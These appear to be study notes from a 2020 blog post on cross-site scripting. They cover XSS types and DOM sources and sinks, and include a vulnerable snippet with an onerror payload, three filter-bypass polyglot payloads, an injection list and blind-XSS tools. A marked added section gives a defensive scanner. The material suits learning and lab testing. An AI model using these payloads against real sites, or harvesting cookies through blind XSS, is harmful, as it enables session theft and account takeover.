XSS

Posted by D on January 9, 2020

XSS

Cross-Site Scripting (XSS). XSS introduction

Reflective XSS

Stored XSS

example1: Myspace Worm - Stored XSS

example2: Tweetdeck Worm - Stored XSS

DOM XSS

DOM XSS - What to Look For?

Sources (attacker-controllable input):
  • document.URL
  • document.referrer
  • location
  • location.href
  • location.search
  • location.hash
  • location.pathname

Sinks (where that input becomes markup or code):
  • element.innerHTML
  • element.outerHTML
  • eval()
  • setTimeout()
  • setInterval()
  • document.write()
  • document.writeln()
DOM XSS - What does it look like?
<!DOCTYPE html>
<html>
	<body>
		<script>
			var source = "Hello " + decodeURIComponent(location.hash.split("#")[1]); //Source
			var divElement = document.createElement("div");
			divElement.innerHTML = source; //Sink
			document.body.appendChild(divElement);
		</script>
	</body>
</html>
GET www.vulnerable-website.example#<img src="test" onerror="alert('XSS')">
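
As an added example (not code from the original post), here is a line-based source-to-sink triage scanner built from the source/sink list above, run over the vulnerable snippet and over a hardened variant that uses textContent instead of innerHTML. The function name findDomXssFlows and the constructed inputs are assumptions; it is a code-review heuristic, not a real taint analysis.

```javascript
// Added example (not from the original post): a line-based source-to-sink
// triage scanner for inline JavaScript, built from the source/sink list
// above. It is a code-review heuristic, not a real taint analysis: it marks
// variables assigned from a source as tainted and flags lines where a
// tainted variable or a source itself reaches a sink.
const SOURCES = [
  "document.URL", "document.referrer", "location.href", "location.search",
  "location.hash", "location.pathname", "location",
];
const SINKS = [
  ".innerHTML", ".outerHTML", "eval(", "setTimeout(", "setInterval(",
  "document.write(", "document.writeln(",
];
const escapeRe = (s) => s.replace(/[$\\]/g, "\\$&");

// Returns [{line, sink, via}] for every sink reached by source-derived data.
function findDomXssFlows(script) {
  const tainted = new Set(); // variable names holding source-derived data
  const findings = [];
  script.split("\n").forEach((text, i) => {
    const line = text.trim();
    const usesSource = SOURCES.some((s) => line.includes(s));
    const usesTainted = [...tainted].some((v) =>
      new RegExp("\\b" + escapeRe(v) + "\\b").test(line));
    // `var NAME =`, `let NAME =`, `const NAME =` or plain `NAME =` (not `==`)
    const assign = line.match(/^(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)/);
    if (assign && (usesSource || usesTainted)) tainted.add(assign[1]);
    for (const sink of SINKS) {
      if (line.includes(sink) && (usesSource || usesTainted)) {
        findings.push({ line: i + 1, sink, via: usesSource ? "source" : "variable" });
      }
    }
  });
  return findings;
}

// Constructed input: the inline script of the vulnerable page above.
const VULNERABLE = `
var source = "Hello " + decodeURIComponent(location.hash.split("#")[1]);
var divElement = document.createElement("div");
divElement.innerHTML = source;
document.body.appendChild(divElement);`;

// Hardened variant: textContent renders the fragment as text, not HTML,
// so the same source never reaches an HTML sink and nothing is flagged.
const HARDENED = VULNERABLE.replace("innerHTML", "textContent");

console.log(findDomXssFlows(VULNERABLE)); // [{ line: 4, sink: '.innerHTML', via: 'variable' }]
console.log(findDomXssFlows(HARDENED));   // []
```

Because the check is per line, a source that is only reached through a function call or an object property is missed; treat a clean result as "nothing obvious", not as proof of safety.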
XSS Polyglot #1(RSnake)
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,
83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromChar
Code(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(
88,83,83))</SCRIPT>

Multi-context, filter bypass based polyglot payload #1 (OWASP XSS Cheat Sheet)

XSS Polyglot #2 (0xsobky)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/
--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

XSS Polyglot #3 (Ashar Javed)
'">><marquee><img src=x
onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouse
over=prompt(1)><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/)
type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&
lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img
src="http://i.imgur.com/P8mL8.jpg">

Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)

Blind XSS

Blind XSS frameworks (on GitHub)

  • sleepy-puppy (Python)
  • xsshunter (Python)
  • ground-control (Ruby, small)

Flash-based XSS

Self XSS

Best Practices

  • Start slow
  • Don’t get discouraged!
  • Keep a list of common payloads
  • Use Burp Intruder

Injections list

"
">
"><>
"><script>
"></script>
"><script>alert(1)</script>
"><script>confirm(1)</script>
...

Tools

Tooling
  • Blind
    • XSStrike
    • XSS Hunter
    • Sleepy Puppy
    • KnoXSS

XSStrike

XSS Hunter (Blind)

Payload reports:

  • The vulnerable page’s URI
  • Origin of Execution
  • The Victim’s IP Address
  • The Page Referer
  • The Victim’s User Agent
  • All Non-HTTP-Only Cookies
  • The Page’s Full HTML DOM
  • Full Screenshot of the Affected Page
  • Responsible HTTP Request (if an XSS Hunter compatible tool is used)

Labs

bWAPP

bWAPP Section - A3 - Cross-Site Scripting (XSS)

Cross-Site Scripting - Reflected (GET)
Cross-Site Scripting - Reflected (POST)
Cross-Site Scripting - Reflected (JSON)
Cross-Site Scripting - Reflected (AJAX/JSON)
Cross-Site Scripting - Reflected (AJAX/XML)
Cross-Site Scripting - Reflected (Back Button)
Cross-Site Scripting - Reflected (Custom Header)
Cross-Site Scripting - Reflected (Eval)
Cross-Site Scripting - Reflected (HREF)
Cross-Site Scripting - Reflected (Login Form)
Cross-Site Scripting - Reflected (phpMyAdmin)
Cross-Site Scripting - Reflected (PHP_SELF)
Cross-Site Scripting - Reflected (Referer)
Cross-Site Scripting - Reflected (User-Agent)
Cross-Site Scripting - Stored (Blog)
Cross-Site Scripting - Stored (Change Secret)
Cross-Site Scripting - Stored (Cookies)
Cross-Site Scripting - Stored (SQLiteManager)
Cross-Site Scripting - Stored (User-Agent)

Additional Labs - PentesterLab

  • XSS and MYSQL FILE
  • Web for Pentester
  • Web for Pentester II